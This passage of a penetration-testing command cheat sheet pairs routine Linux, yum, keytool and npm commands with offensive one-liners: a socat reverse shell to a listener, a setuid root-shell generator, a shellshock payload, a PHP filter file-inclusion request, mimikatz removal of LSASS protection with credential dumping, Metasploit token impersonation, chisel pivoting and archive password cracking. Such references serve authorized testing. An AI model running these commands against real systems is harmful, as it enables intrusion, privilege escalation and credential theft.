|
||
tags: yum
|
||
desc: Install a package from repository
|
||
- cmd: yum remove <package-name>
|
||
lang: sh
|
||
tags: yum
|
||
desc: Remove/delete package
|
||
- cmd: yum localinstall <filepath-rpm>
|
||
lang: sh
|
||
tags: yum
|
||
desc: Install local rpm package
|
||
- cmd: yum update --security
|
||
lang: sh
|
||
tags: yum
|
||
desc: Install security updates
|
||
- cmd: yum deplist <package-name>
|
||
lang: sh
|
||
tags: yum
|
||
desc: List dependencies of package
|
||
- cmd: yum autoremove
|
||
lang: sh
|
||
tags: yum
|
||
desc: Remove un-needed packages and dependencies
|
||
- cmd: yum whatprovides <query>
|
||
lang: sh
|
||
tags: yum
|
||
desc: Whatprovides package/file/binary
|
||
- cmd: yum repolist
|
||
lang: sh
|
||
tags: yum
|
||
desc: List currently enabled repositories
|
||
- cmd: keytool -genkey -alias <ALIAS> -keyalg RSA -keystore <OUTPUT_JKS> -keysize <RSA_LENGTH>
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: Generate a Java keystore and key pair
|
||
- cmd: keytool -certreq -alias <ALIAS> -keystore <INPUT_JKS> -file <OUTPUT_CSR>
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: Generate a certificate signing request (CSR) for an existing Java keystore
|
||
- cmd: keytool -import -trustcacerts -alias root -file <INPUT_CRT> -keystore <INPUT_JKS>
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: Import a root or intermediate CA certificate to an existing Java keystore
|
||
- cmd: keytool -import -trustcacerts -alias <ALIAS> -file <INPUT_CRT> -keystore <INPUT_JKS>
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: Import a signed primary certificate to an existing Java keystore
|
||
- cmd: keytool -genkey -keyalg RSA -alias <ALIAS> -keystore <OUTPUT_JKS> -storepass <PASSWORD> -validity <VALIDITY> -keysize <RSA_LENGTH>
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: Generate a keystore and self-signed certificate
|
||
- cmd: keytool -printcert -v -file <INPUT_CRT>
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: Check a stand-alone certificate
|
||
- cmd: keytool -list -v -keystore <INPUT_JKS>
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: Check which certificates are in a Java keystore
|
||
- cmd: keytool -list -v -keystore <INPUT_JKS> -alias <ALIAS>
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: Check a particular keystore entry using an alias
|
||
- cmd: keytool -delete -alias <ALIAS> -keystore <INPUT_JKS>
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: Remove a certificate from a keystore
|
||
- cmd: keytool -storepasswd -keystore <INPUT_JKS> -new <NEW_PASSWORD>
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: Change the password of a keystore
|
||
- cmd: keytool -export -alias <ALIAS> -file <OUTPUT_CRT> -keystore <INPUT_JKS>
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: Export a certificate from a keystore
|
||
- cmd: keytool -list -v -keystore $JAVA_HOME/jre/lib/security/cacerts
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: List the trusted CA Certs from the default Java Trusted Certs Keystore
|
||
- cmd: keytool -import -trustcacerts -file <INPUT_PEM> -alias <ALIAS> -keystore $JAVA_HOME/jre/lib/security/cacerts
|
||
lang: sh
|
||
tags: java keytool, certificate, encryption
|
||
desc: Import New Certificate Authority into the default Java Trusted Certs Keystore
|
||
- cmd: echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0; }' > pwn.c; ; gcc pwn.c -o <filename|shell>; ; rm pwn.c
|
||
lang: bash
|
||
tags: c, shell
|
||
desc: generate shell bash bin
|
||
- cmd: DotNetToJScript.exe <dll|ExampleAssembly.dll> --lang=Jscript --ver=v4 -o <jscript|runner.js>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: DotNetToJScript
|
||
- cmd: npm init
|
||
lang: sh
|
||
tags: npm, node, js
|
||
desc: initial new package
|
||
- cmd: npm init -y
|
||
lang: sh
|
||
tags: npm, node, js
|
||
desc: initial immediately a new package
|
||
- cmd: npm install
|
||
lang: sh
|
||
tags: npm, node, js
|
||
desc: install all dependencies packages
|
||
- cmd: npm install --save-dev
|
||
lang: sh
|
||
tags: npm, node, js
|
||
desc: install all dev dependencies packages
|
||
- cmd: npm install <package_name>
|
||
lang: sh
|
||
tags: npm, node, js
|
||
desc: install a specified package
|
||
- cmd: npm install <package_name> --save-dev
|
||
lang: sh
|
||
tags: npm, node, js
|
||
desc: install a specified dev package
|
||
- cmd: npm install <package_name> -g
|
||
lang: sh
|
||
tags: npm, node, js
|
||
desc: install globally a specified package
|
||
- cmd: nvm install <version>
|
||
lang: sh
|
||
tags: nvm, node, js
|
||
desc: install a specified version of node
|
||
- cmd: nvm ls-remote
|
||
lang: sh
|
||
tags: nvm, node, js
|
||
desc: list available versions
|
||
- cmd: nvm use <version>
|
||
lang: sh
|
||
tags: nvm, node, js
|
||
desc: use installed node's version
|
||
- cmd: nvm alias default <version>
|
||
lang: sh
|
||
tags: nvm, node, js
|
||
desc: set a node's version as default
|
||
- cmd: grep -rn --include "*.js" -e "^\(.*\s\|.*child_process.*|\)\(exec\|spawn\|eval\|execSync\|spawnSync\|execFileSync\)(" --color
|
||
lang: sh
|
||
tags: whitebox, nodejs
|
||
desc: command execution
|
||
- cmd: grep -rn --include "*.js" -e "^\(.*\s\|\)\(require\)(" --color; grep -rn --include "*.js" -e "^\(.*\s\|\)\(appendFile\|open\|readFile\|WriteFile\\|unlink\|rename\|formidable)(" --color; grep -rn --include "*.js" -e "unserialize(" --color
|
||
lang: sh
|
||
tags: whitebox, nodejs
|
||
desc: require
|
||
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(include\|require\|virtual\|require_once\|include_once\)\(\s\|(\).*\\$" --color
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep include
|
||
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(readfile\|file_get_contents\|stream_get_contents\|show_source\|fopen\|file\|fpassthru\|gzopen\|gzfile\|gzpassthru\|readgzfile\)\(\s\|(\).*\\$" --color
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep path traversal
|
||
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(eval\|popen\|pcntl_exec\|assert\|proc_open\|create_function\|call_user_func\|call_user_func_array\|exec\|shell_exec\|system\|passthru\|virtual\)([^)]*\\$" --color
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep exec
|
||
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(preg_replace\|ereg_replace\|eregi_replace\|mb_ereg_replace\|mb_eregi_replace\)(.*\\$" --color
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep replace
|
||
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)unserialize(.*\\$" --color
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep unserialize
|
||
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)ldap_search(.*\\$" --color
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep ldap
|
||
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)xpath.*\\$" --color
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep xpath
|
||
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)mail(.*\\$" --color
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep mail
|
||
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(echo\|printf\|print\)\(\s\|(\).*\\$" --color
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep echo
|
||
- cmd: grep -rn --include "*.php" -e "\(\\\$[^=]\|0\)\s*==\s*\(0\|\\\$[^=]\\)" --color
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep weak comparison
|
||
- cmd: grep -rn --include "*.php" -e "\(\$_GET\|\$_POST\|\$_FILES\|\$REQUEST\|\$_COOKIES\|\$_SESSION\|\$_SERVER\|\$_GLOBALS\)" --color
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep entry points
|
||
- cmd: grep -rn --include "*.php" -e "^\(.*\s\|\)\(ob_start\|array_diff_uassoc\|array_diff_ukey\|array_filter\|array_intersect_uassoc\|array_intersect_ukey\|array_map\|array_reduce\|array_udiff_assoc\|array_udiff_uassoc\|array_udiff\|array_uintersect_assoc\|array_uintersect_uassoc\|array_uintersect\|array_walk_recursive\|array_walk\|assert_options\|uasort\|uksort\|usort\|preg_replace_callback\|spl_autoload_register\|iterator_apply\|register_shutdown_function\|register_tick_function\|set_error_handler\|set_exception_handler\|session_set_save_handler\|sqlite_create_aggregate\|sqlite_create_function\)(.*\\$"
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep callbacks
|
||
- cmd: grep -rn --include "*.php" -e "curl_exec" --color
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep curl
|
||
- cmd: grep -rni --include "*.php" -e "\(where\|query\).*\\$"
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep where or query
|
||
- cmd: for f in *.php; do grep "/include/auth.php" $f || echo $f; done |grep -v include | grep -v require
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php grep file not contain an auth file include
|
||
- cmd: curl <url>?<param>=php://filter/read=convert.base64-encode/resource=<file>.php
|
||
lang: sh
|
||
tags: php, whitebox
|
||
desc: php wrapper lfi
|
||
- cmd: crontab -l
|
||
lang: sh
|
||
tags: crontab, schedule
|
||
desc: List cron jobs
|
||
- cmd: crontab -e
|
||
lang: sh
|
||
tags: crontab, schedule
|
||
desc: Edit cron job
|
||
- cmd: grep <word> <file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: grep classic
|
||
- cmd: grep -i <word> <file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: grep without case
|
||
- cmd: grep <word> <file> -H
|
||
lang: sh
|
||
tags: pentest
|
||
desc: grep with file found
|
||
- cmd: grep -rn --include "*.<extension>" <word>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: grep recursive on extension
|
||
- cmd: grep -e "\(<word_A>\|<word_B>\)" <file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: grep word A or B
|
||
- cmd: egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract md5 hashes ({32})
|
||
- cmd: egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{40}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{40}' > sha1-hashes.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract sha1 ({40})
|
||
- cmd: egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{64}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{64}' > sha256-hashes.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract sha256({64})
|
||
- cmd: egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{128}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{128}' > sha512-hashes.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract sha512({128})
|
||
- cmd: grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract valid MySQL-Old hashes
|
||
- cmd: grep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract blowfish hashes
|
||
- cmd: egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract Joomla hashes
|
||
- cmd: egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract VBulletin hashes
|
||
- cmd: egrep -o '$H$S{31}' *.txt > phpBB3-md5.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract phpBB3-MD5
|
||
- cmd: egrep -o '$P$S{31}' *.txt > wordpress-md5.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract Wordpress-MD5
|
||
- cmd: egrep -o '$S$S{52}' *.txt > drupal-7.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract Drupal 7
|
||
- cmd: egrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract old Unix-md5
|
||
- cmd: egrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract md5-apr1
|
||
- cmd: egrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract sha512crypt, SHA512(Unix)
|
||
- cmd: grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" <file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract emails from file
|
||
- cmd: grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" <file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract valid IP addresses
|
||
- cmd: grep -i "pwd\|passw" <file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract passwords
|
||
- cmd: grep -i "user\|invalid\|authentication\|login" <file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract users
|
||
- cmd: grep -i http | grep -shoP 'http.*?[" >]' <file> > http-urls.txt
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Extract HTTP URLS
|
||
- cmd: i686-w64-mingw32-gcc <source.c> -lws2_32 -o <output.exe>
|
||
lang: sh
|
||
tags: compile
|
||
desc: compile windows PE 32 executable on linux
|
||
- cmd: sudo !!
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Re-call last input with sudo
|
||
- cmd: help cd / help dir (...)
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Help
|
||
- cmd: apropos directory / apropos search (...)
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Finding Help
|
||
- cmd: sudo nano /etc/motd
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Define custom startup screen
|
||
- cmd: <process> &
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Run a script as background process
|
||
- cmd: ps -A
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: List all running processes
|
||
- cmd: killall <Process-name>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Kill a running process
|
||
- cmd: pwd
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Get the current path
|
||
- cmd: hostname
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Get the current hostname
|
||
- cmd: users
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Get the current users
|
||
- cmd: cal
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Show calendar
|
||
- cmd: date
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Show today's date
|
||
- cmd: exit
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Exit terminal
|
||
- cmd: ps -ef | grep apache | grep -v grep
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: show process command
|
||
- cmd: chgrp <group-name-from> <group-name-to>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Change group
|
||
- cmd: ls -Slrh
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: List directory contents by size
|
||
- cmd: ls -altr
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: List all directory contents sorted by time edited reverse
|
||
- cmd: ls *.<txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: List directory (wildcard matching)
|
||
- cmd: find . -name *.<txt> -print
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: List all files of type
|
||
- cmd: cd -
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Go back to previous directory
|
||
- cmd: mkdir <dirname>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Make (empty) directory
|
||
- cmd: rmdir <dirname>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Remove (empty) directory
|
||
- cmd: rm -rf <dirname>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Remove directory with all contents without prompt
|
||
- cmd: rm -rf *
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Remove directory contents and keep directory
|
||
- cmd: cd <dirname>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Change directory
|
||
- cmd: ln -s <source-dirname> <destination-dirname>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Create symlink
|
||
- cmd: ln -sfn <source-dirname> <destination-dirname>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Update symlink
|
||
- cmd: unlink <sample-dirname>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Remove symlink
|
||
- cmd: touch <filename-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Make (empty) file
|
||
- cmd: cp <filename> <file-copyname>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Copy file
|
||
- cmd: cp -a <old-folder>/ <new-folder>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Copy/Page folder with content
|
||
- cmd: mv <current-filename-path> <new-filename-path>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Move/Rename file
|
||
- cmd: mv -i <current-filename> <new-filename>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Move/Rename file and prompt before overwriting an existing file
|
||
- cmd: rm <filename-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Remove file
|
||
- cmd: cat > <filename-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Write to file (will overwrite existing content)
|
||
- cmd: find <filename-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Search for a filename-(not content!) in the current directory
|
||
- cmd: grep -r <string> *
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Search for a string inside all files in the current directory and subdrectories
|
||
- cmd: sed -i s/<original-text>/<new-text>/g <filename-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Search and replace within file
|
||
- cmd: md5sum <filename-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: MD5 hash for files
|
||
- cmd: tar c <folder> | md5sum
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: MD5 hash for folders
|
||
- cmd: openssl enc -aes-256-cbc -e -in <sample-filename-txt> -out <sample-encrypted-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Encrypt file
|
||
- cmd: openssl enc -aes-256-cbc -d -in <sample-encrypted> -out <sample-filename>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Decrypt file
|
||
- cmd: <username-remote>@<ip>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Access via ssh
|
||
- cmd: scp <username-remote>@<ip>:<file-to-send-path> <path-to-recieve>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Copy file from server to local
|
||
- cmd: scp <file-to-send> <username-remote>@<ip>:<where-to-put>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Copy file from local to server
|
||
- cmd: <path-to-file>\\\ <name-png>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Escape files with spaces in name like this
|
||
- cmd: df -h
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Show disc space
|
||
- cmd: df -i
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Show disc space (inodes)
|
||
- cmd: du -hs
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Show disc space for current directory
|
||
- cmd: top or htop
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Current processes (also CPS usage)
|
||
- cmd: ps aux | grep php
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Show running php processes
|
||
- cmd: tail error.log -f -n 0
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Monitor error log (stream as file grows)
|
||
- cmd: xdg-open <programme>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Start application
|
||
- cmd: export <TESTING>=<Variable-text>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Register variable
|
||
- cmd: echo $<Variable>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Echo variable
|
||
- cmd: unset <Variable>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Unset variable
|
||
- cmd: echo <Hello> > <hello-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Write to file
|
||
- cmd: cat <file1-txt> >> <file2-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Append content from a file to another file
|
||
- cmd: cat <file1-txt> | <word-count> | cat > <file2-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Add the amount of lines, words, and characters to file2-txt
|
||
- cmd: sort <hello-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Sort the content of a file (like cat)
|
||
- cmd: cat <file1-txt> | sort > <sorted-file1-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Save to sorted content to a new file
|
||
- cmd: sort <file1-txt> | uniq > <uniq-file1-txt>
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: Sort and remove duplicates and save to a new file
|
||
- cmd: 'curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" <url>'
|
||
lang: sh
|
||
tags: shell, linux
|
||
desc: shellshock
|
||
- cmd: echo <content> | curl -F-=\<- qrenco.de
|
||
lang: sh
|
||
tags: qr code
|
||
desc: Create a QR code with some content
|
||
- cmd: cat <json_file> | ruby -ryaml -rjson -e 'puts YAML.dump(JSON.load(ARGF))'
|
||
lang: sh
|
||
tags: json
|
||
desc: convert JSON to YAML
|
||
- cmd: grep <pattern> <file> | tr '\n' ' '
|
||
lang: sh
|
||
tags: misc, linux
|
||
desc: Convert multi line to one line
|
||
- cmd: grep <pattern> <file>.gnmap|cut -d ' ' -f 2 | tr '\n' ' '
|
||
lang: sh
|
||
tags: misc, linux
|
||
desc: grep nmap protocol from file and get ips in one line
|
||
- cmd: amap -d <ip> <port>
|
||
lang: sh
|
||
tags: misc, linux
|
||
desc: find service on port
|
||
- cmd: sed 's/ 7z/ Android-Debug-Bridge-adb/ apktool/ application-whitelisting/ Arsenal/ AWS/ binwalk/ bloodhound/ bof/ Brew/ C/ certipy/ certutil/ cewl/ chisel/ cme/ coercer/ Compile-windows-PE-32/ Crack-files/ Crontab/ crunch/ cve-bin-tool/ Dirb/ DNS/ Docker/ dotnet-.net/ drupwn/ enum4linux/ eyewitness/ feroxbuster/ ffuf/ flashrom/ FTP/ git/ gobuster/ gowitness/ gpg/ grep/ grep-hash/ gzip/ hashcat/ Hydra/ impacket/ Impacket/ Jadx/ john-the-ripper/ json/ JwtTool/ kerberos/ keytool/ kubernetes/ LAPS/ Lazagne/ ldap/ linux/ linux-bash/ Lsassy/ mimikatz/ mitm6/ MSF/ msfvenom/ msfvenom-create-user/ msfvenom-Handler/ msfvenom-Shellcode/ msssql/ Mysql/ ncat/ netbios/ netcat/ network/ nfs/ nikto/ nmap/ nodejs/ npm/ nvm/ Objection/ openssl/ Others-grep/ php-grep/ pop/ Postgres/ powershell/ powerview/ Printerbug-and-Petitpotam/ procdump/ QR-code/ race-condition/ rar/ rdesktop/ Redis/ responder/ reverse-shell/ rpcclient/ rubeus/ Scripting-Payloads/ SCShell/ Searchsploit/ sed/ server/ Service/ smb/ smbmap/ SMTP/ snmp/ socat/ SQLMAP/ ssh/ systemctl/ tar/ telnet/ Tomcat/ unblob/ veracrypt/ VNC/ WEB/ web-shell/ wfuzz/ wifi/ windows/ windows-rdp/ winrm/ WPSCAN/ X11/ xfreerdp/ ysoserial/ ysoserial.net/ yum/ zip/ /g'
|
||
lang: sh
|
||
tags: sed
|
||
desc: change multiple space to one
|
||
- cmd: sed 's/.$//g'
|
||
lang: sh
|
||
tags: sed
|
||
desc: delete the last char
|
||
- cmd: veracrypt -t --create <file> --hash sha512 --encryption AES --filesystem ext4 --volume-type normal -k "" --pim 0 --size <size>
|
||
lang: sh
|
||
tags: veracrypt
|
||
desc: Create veracrypt volume for Linux
|
||
- cmd: veracrypt <file> <mount>
|
||
lang: sh
|
||
tags: veracrypt
|
||
desc: Open veracrypt volume
|
||
- cmd: veracrypt -d <file>
|
||
lang: sh
|
||
tags: veracrypt
|
||
desc: Lock veracrypt volume
|
||
- cmd: veracrypt -d
|
||
lang: sh
|
||
tags: veracrypt
|
||
desc: Lock all veracrypt volume
|
||
- cmd: sessions -u <session_id>
|
||
lang: sh
|
||
tags: metasploit
|
||
desc: upgrade session to meterpreter
|
||
- cmd: sessions -l
|
||
lang: sh
|
||
tags: metasploit
|
||
desc: show session list
|
||
- cmd: route print
|
||
lang: sh
|
||
tags: metasploit
|
||
desc: print route table
|
||
- cmd: use multi/manage/autoroute
|
||
lang: sh
|
||
tags: metasploit
|
||
desc: add pivot (autoroute)
|
||
- cmd: use auxiliary/server/socks_proxy
|
||
lang: sh
|
||
tags: metasploit
|
||
desc: add socks proxy (autoroute first)
|
||
- cmd: load incognito
|
||
lang: sh
|
||
tags: metasploit
|
||
desc: load incognito
|
||
- cmd: impersonate_token <domain>\\<user>
|
||
lang: sh
|
||
tags: metasploit
|
||
desc: incognito impersonate token
|
||
- cmd: execute -H -f <process|notepad>
|
||
lang: sh
|
||
tags: metasploit
|
||
desc: create process
|
||
- cmd: migrate -N <process_name|notepad.exe>
|
||
lang: sh
|
||
tags: metasploit
|
||
desc: migrate with name
|
||
- cmd: load kiwi; kiwi_cmd "!processprotect /process:lsass.exe /remove"; creds_all
|
||
lang: sh
|
||
tags: metasploit
|
||
desc: PPL remove
|
||
- cmd: use post/windows/gather/credentials/enum_laps
|
||
lang: sh
|
||
tags: metasploit
|
||
desc: enum LAPS
|
||
- cmd: searchsploit -m <ebdid>
|
||
lang: sh
|
||
tags: searchsploit, exploit db
|
||
desc: searchsploit mirror exploitDB id
|
||
- cmd: searchsploit -x <edbid>
|
||
lang: sh
|
||
tags: searchsploit, exploit db
|
||
desc: searchsploit show exploitDB id
|
||
- cmd: ./chisel server -v -p <server_port|8000> --reverse
|
||
lang: sh
|
||
tags: chisel
|
||
desc: chisel server (server on local machine)
|
||
- cmd: ./chisel client -v <server_ip>:<server_port|8000> R:<serverside-port>:<clientside-host|localhost>:<clientside-port>
|
||
lang: sh
|
||
tags: chisel
|
||
desc: chisel reverse port forwarding (client on remote machine) - forward client port on server
|
||
- cmd: ./chisel client -v <server_ip>:<server_port|8000> <clientside-host|0.0.0.0>:<clientside-port>:<serverside-host|127.0.0.1>:<serverside-port>
|
||
lang: sh
|
||
tags: chisel
|
||
desc: chisel remote port forwarding (client on remote machine) - forward server port on client
|
||
- cmd: ./chisel client <server_ip>:<server_port> R:socks
|
||
lang: sh
|
||
tags: chisel
|
||
desc: chisel socks proxy (client on remote machine)
|
||
- cmd: curl https://ipinfo.io/<ip>
|
||
lang: sh
|
||
tags: network, ip
|
||
desc: ip infos (hostname / city / country / isp )
|
||
- cmd: curl https://ipinfo.io/
|
||
lang: sh
|
||
tags: network, ip
|
||
desc: what is my ip
|
||
- cmd: curl https://ipecho.net/plain/
|
||
lang: sh
|
||
tags: network, ip
|
||
desc: what is my ip - plaintext
|
||
- cmd: curl portquiz.net:<port>
|
||
lang: sh
|
||
tags: network, ip
|
||
desc: test an internet port out allow - curl (no 445)
|
||
- cmd: nc -v portquiz.net <port>
|
||
lang: sh
|
||
tags: network, ip
|
||
desc: test an internet port out allow - nc (no 445)
|
||
- cmd: ./socat TCP-LISTEN:<port_listener|4444>,fork,reuseaddr TCP-LISTEN:<port_to_forward>
|
||
lang: sh
|
||
tags: socat
|
||
desc: socat port forwarding listener (on local machine)
|
||
- cmd: ./socat TCP:<connect_ip>:<connect_port|4444> TCP:127.0.0.1:<port_to_forward>
|
||
lang: sh
|
||
tags: socat
|
||
desc: socat port forwarding connect (on remote machine)
|
||
- cmd: ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<listner_ip>:<listner_port|4444>
|
||
lang: sh
|
||
tags: socat
|
||
desc: socat reverse shell (remote victime)
|
||
- cmd: socat file:`tty`,raw,echo=0 tcp-listen:<listner_port|4444>
|
||
lang: sh
|
||
tags: socat
|
||
desc: socat reverse shell listener (local)
|
||
- cmd: fcrackzip -u -D -p <wordlist> <file>.zip
|
||
lang: sh
|
||
tags: bruteforce, crack, files
|
||
desc: ZIP - fcrackzip
|
||
- cmd: zip2john <file>.zip > zip.john; ; john zip.john
|
||
lang: sh
|
||
tags: bruteforce, crack, files
|
||
desc: ZIP - john
|
||
- cmd: cat <wordlist> | 7za t <file>.7z
|
||
lang: sh
|
||
tags: bruteforce, crack, files
|
||
desc: 7z - 7za
|
||
- cmd: ./7z2john.pl <file>.7z > 7zhash.john; ; john 7zhash.john
|
||
lang: sh
|
||
tags: bruteforce, crack, files
|
||
desc: 7z - john
|
||
- cmd: pdfcrack <file>.pdf -w <wordlist>
|
||
